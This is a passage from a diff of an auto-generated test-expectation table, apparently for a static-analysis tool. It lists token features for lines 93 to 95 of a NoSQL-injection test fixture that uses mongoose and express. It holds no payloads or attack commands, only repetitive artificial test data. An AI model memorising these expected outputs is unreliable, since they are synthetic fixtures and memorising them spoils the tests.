enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:48 | err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:48 | exceptional return of err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:48 | exceptional return of err.count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:48 | exceptional return of err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:33:93:48 | exceptional return of err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:37:93:41 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:37:93:41 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:37:93:41 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:37:93:41 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:43:93:47 | query | CalleeFlexibleAccessPath | err.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:43:93:47 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:43:93:47 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | @@ -2713,6 +13664,38 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:43:93:47 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:43:93:47 | query | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:93:43:93:47 | query | receiverName | err | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:17 | Document.find(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:17 | Document.find(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:17 | Document.find(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:17 | Document.find(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:17 | exceptional return of Document.find(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:17 | exceptional return of Document.find(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:17 | exceptional return of Document.find(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:17 | exceptional return of Document.find(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:22 | Documen ... X).exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:22 | Documen ... X).exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:22 | Documen ... X).exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:22 | Documen ... X).exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:57 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:57 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:57 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:57 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:57 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:57 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:57 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:2:94:57 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:11:94:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:11:94:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:11:94:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:11:94:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:16:94:16 | X | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:16:94:16 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:16:94:16 | X | calleeImports | mongoose | @@ -2721,6 +13704,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:16:94:16 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:16:94:16 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:16:94:16 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:19:94:22 | exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:19:94:22 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:19:94:22 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:19:94:22 | exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:23 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:23 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:23 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:23 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.find().exec | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | (err, r ... (query) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | (err, r ... (query) | calleeImports | mongoose | @@ -2728,12 +13723,92 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | (err, r ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | (err, r ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:24:94:56 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:25:94:27 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:25:94:27 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:25:94:27 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:25:94:27 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:30:94:32 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:30:94:32 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:30:94:32 | res | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:30:94:32 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:30:94:32 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:30:94:32 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:30:94:32 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:30:94:32 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:40 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:40 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:40 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:40 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:43 | res[i] | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:43 | res[i] | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:43 | res[i] | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:43 | res[i] | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:49 | res[i].count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:49 | res[i].count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:49 | res[i].count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:49 | res[i].count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:56 | exceptional return of res[i].count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:56 | exceptional return of res[i].count(query) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:56 | exceptional return of res[i].count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:56 | exceptional return of res[i].count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:56 | res[i].count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:56 | res[i].count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:56 | res[i].count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:38:94:56 | res[i].count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:42:94:42 | i | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:42:94:42 | i | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:42:94:42 | i | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:42:94:42 | i | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:45:94:49 | count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:45:94:49 | count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:45:94:49 | count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:45:94:49 | count | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:51:94:55 | query | CalleeFlexibleAccessPath | res.?.count | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:51:94:55 | query | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:51:94:55 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:51:94:55 | query | contextSurroundingFunctionParameters | (req, res)\n(err, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:51:94:55 | query | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:94:51:94:55 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:9 | Document | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:9 | Document | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:9 | Document | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:9 | Document | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:14 | Document.find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:14 | Document.find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:14 | Document.find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:14 | Document.find | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:17 | Document.find(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:17 | Document.find(X) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:17 | Document.find(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:17 | Document.find(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:17 | exceptional return of Document.find(X) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:17 | exceptional return of Document.find(X) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:17 | exceptional return of Document.find(X) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:17 | exceptional return of Document.find(X) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:22 | Documen ... X).exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:22 | Documen ... X).exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:22 | Documen ... X).exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:22 | Documen ... X).exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:54 | Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:54 | Documen ... query)) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:54 | Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:54 | Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:54 | exceptional return of Documen ... query)) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:54 | exceptional return of Documen ... query)) | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:54 | exceptional return of Documen ... query)) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:2:95:54 | exceptional return of Documen ... query)) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:11:95:14 | find | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:11:95:14 | find | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:11:95:14 | find | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:11:95:14 | find | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:16:95:16 | X | CalleeFlexibleAccessPath | Document.find | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:16:95:16 | X | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:16:95:16 | X | calleeImports | mongoose | @@ -2742,6 +13817,18 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:16:95:16 | X | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:16:95:16 | X | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:16:95:16 | X | receiverName | Document | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:19:95:22 | exec | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:19:95:22 | exec | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:19:95:22 | exec | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:19:95:22 | exec | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:23 | query | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:23 | query | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:23 | query | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:23 | query | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | 'arguments' object of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | 'arguments' object of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | 'arguments' object of anonymous function | fileImports | body-parser express mongoose | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | (err, r ... (query) | CalleeFlexibleAccessPath | Document.find().exec | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | (err, r ... (query) | InputArgumentIndex | 0 | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | (err, r ... (query) | calleeImports | mongoose | @@ -2749,6 +13836,46 @@ tokenFeatures | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | (err, r ... (query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | (err, r ... (query) | enclosingFunctionName | app.post#functionalargument | | autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | (err, r ... (query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | exceptional return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | exceptional return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | exceptional return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | return of anonymous function | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | return of anonymous function | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:24:95:53 | return of anonymous function | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:25:95:27 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:25:95:27 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:25:95:27 | err | contextSurroundingFunctionParameters | | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:25:95:27 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:25:95:27 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:25:95:27 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:25:95:27 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:25:95:27 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:30:95:32 | res | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:30:95:32 | res | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:30:95:32 | res | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:30:95:32 | res | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:40 | err | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:40 | err | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:40 | err | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:40 | err | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:46 | err.count | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:46 | err.count | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:46 | err.count | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:46 | err.count | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:53 | err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:53 | err.count(query) | contextSurroundingFunctionParameters | (req, res)\n(err, res) | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:53 | err.count(query) | enclosingFunctionName | app.post#functionalargument | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:53 | err.count(query) | fileImports | body-parser express mongoose | +| autogenerated/NosqlAndSqlInjection/untyped/mongoose.js:95:38:95:53 | exceptional return of err.count(query) | contextFunctionInterfaces | getQueryConstructor()\ninnocent(X, Y, query) | +| 